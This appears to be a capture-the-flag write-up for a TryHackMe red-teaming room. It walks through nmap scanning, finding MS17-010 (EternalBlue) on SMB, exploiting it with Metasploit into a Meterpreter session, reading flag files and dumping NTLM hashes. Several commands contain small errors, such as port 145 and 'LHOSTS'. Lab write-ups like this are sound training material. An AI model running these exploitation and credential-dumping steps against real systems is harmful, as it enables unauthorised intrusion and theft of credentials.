TryHackMe
Intro to C2
Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment!
This room is part of TryHackMe’s Red Teaming Path!
For this write-up, I’ll just be focusing on Task 6 as the rest of the other tasks are theory-based. But do comment if you have troubles with the other tasks and I’ll try my best to help. 😃
Task 6 Command, Control, and Conquer
This task showcases the use of Armitage. But.
Practice Time
Now that you have learned how to exploit hosts using Armitage, you will now get to practice your skills by hacking the virtual machine by using Metasploit and Armitage. There are multiple exploit paths that you may be able to follow. We encourage you to explore the various exploit paths you may be able to find in order to gain a better understanding of exploitation and post-exploitation modules in Metasploit and Armitage. As a reminder, Armitage is just Metasploit with a GUI; all the same exploits exist and are categorized the same way.
So I’ll be using Metasploit for this room. 😆
Start the machine and let’s do an initial NMAP scan.
nmap -sCV -A -Pn -T5 -v MachineIPThere’s a total of 32 services running on the machine, but only 1 service caught my attention immediately. And that’s the SMB service running on ports 139 and 445 respectively.
So let’s do another NMAP scan to see if the service is vulnerable to any existing exploits.
nmap -p 139,145 — script smb-vuln* -v MachineIPAnd we have a hit! MS17–010 or more commonly known as ETERNAL BLUE.
Let’s exploit this using Metasploit.
msfconsole
search ms17-010
use 0
show options
set RHOSTS MachineIP
set LHOSTS Tun0/AttackerIP
run/exploit
Once the exploit runs, give it a while to get the Meterpreter up and running.
Using this method, we have root access straight away so we can navigate to the user’s and Administrator’s desktops and retrieve the flags from there.
shell
CD C:\Users\Administrator\Desktop
type root.txt
CD C:\Users\Ted\Desktop
type user.txtAnd to get the NTLM hash, all you have to do is enter hashdump while you are in Meterpreter and not the shell!
And that’s the end of my write-up. Hope you find this useful and let me know if you have problems answering any of the questions found in the room! Thank you for reading. 😄
